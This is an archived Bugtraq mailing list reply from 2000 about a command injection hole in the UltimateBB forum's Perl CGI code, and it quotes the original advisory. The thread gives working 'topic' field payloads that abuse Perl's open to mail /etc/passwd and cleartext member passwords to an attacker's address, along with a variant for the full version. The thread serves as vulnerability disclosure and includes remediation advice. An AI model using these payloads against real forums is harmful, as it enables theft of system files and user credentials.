Re: perl-cgi hole in UltimateBB by Infopop Corp.

From: Kevin Hillabolt (khillat_private)
Date: Mon Feb 14 2000 - 16:46:11 PST

Next message: Dale Whitchurch: "Re: Timbuktu Pro 2.0b650 DoS"

Previous message: Milan WWW Pikula: "ANNOUNCE: Medusa DS9 security system"
Maybe in reply to: Sergei A. Golubchik: "perl-cgi hole in UltimateBB by Infopop Corp."
Next in thread: Andrew Danforth: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It works on the full version also...

Little different syntax:
topic=012345.cgi|cat%20../Members/*|mail hackerat_private|
(note the ../ on the Members.  You have to go up a directory to get the
file.  Maybe you could stop it via simple folder permissions??)

Regards,
Kevin Hillabolt


----- Original Message -----
From: "Sergei A. Golubchik" <sergat_private>
To: <BUGTRAQat_private>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.


> Hello.
>
> Writing cgi scripts in perl is simple. It's also rather safe,
> providing authors follow very simple instructions. But they don't.
>
> Browsing some site, I found that their forums were based not on home-
> made scripts, but rather commercial software product. Hey, said I to
> myself, remember those story about pcweek hack ? They use commercial
> package photoads. Let's look what that Ultimate Bulletin Board by
> Infopop is.
>
> I grabbed freeware version from http://www.ultimatebb.com and
> after 10-minutes grepping found those lines:
>
> ubb_library.pl:901-902
>           if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
>           open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
>
> (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while
> writing it ? Girls ?)
>
> And the $ThreadFile takes its value directly from the hidden (hmm!)
> field `topic'.
>
> So when I filled the form with
> topic='012345.ubb|mail hackerat_private </etc/passwd|'
> It happily gives me /etc/passwd. And
> topic='012345.ubb|cat Members/*|mail hackerat_private|'
> shows all users of bulletin board, and their passwords too (in
cleartext!).
>
> So one should only open "reply" form in the forum, save it to disk,
> and set topic field to whatever he want. And this stupid UBB (at least
> freeware version) doesn't keep the logs (unless, so-called, hacklog,
> used when the condition above is not met).
>
> The fix is obvious. But the rule of the thumb is "do not use magic perl
open".
> At least in cgi scripts. If you want to open regular file, sysopen does
> the trick as well.
>
> And again: CHECK EVERYTHING!
>
> Regards,
> SerG.
>
> P.S. Vendor was notified.
>
>

Next message: Dale Whitchurch: "Re: Timbuktu Pro 2.0b650 DoS"
Previous message: Milan WWW Pikula: "ANNOUNCE: Medusa DS9 security system"
Maybe in reply to: Sergei A. Golubchik: "perl-cgi hole in UltimateBB by Infopop Corp."
Next in thread: Andrew Danforth: "Re: perl-cgi hole in UltimateBB by Infopop Corp."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:53 PDT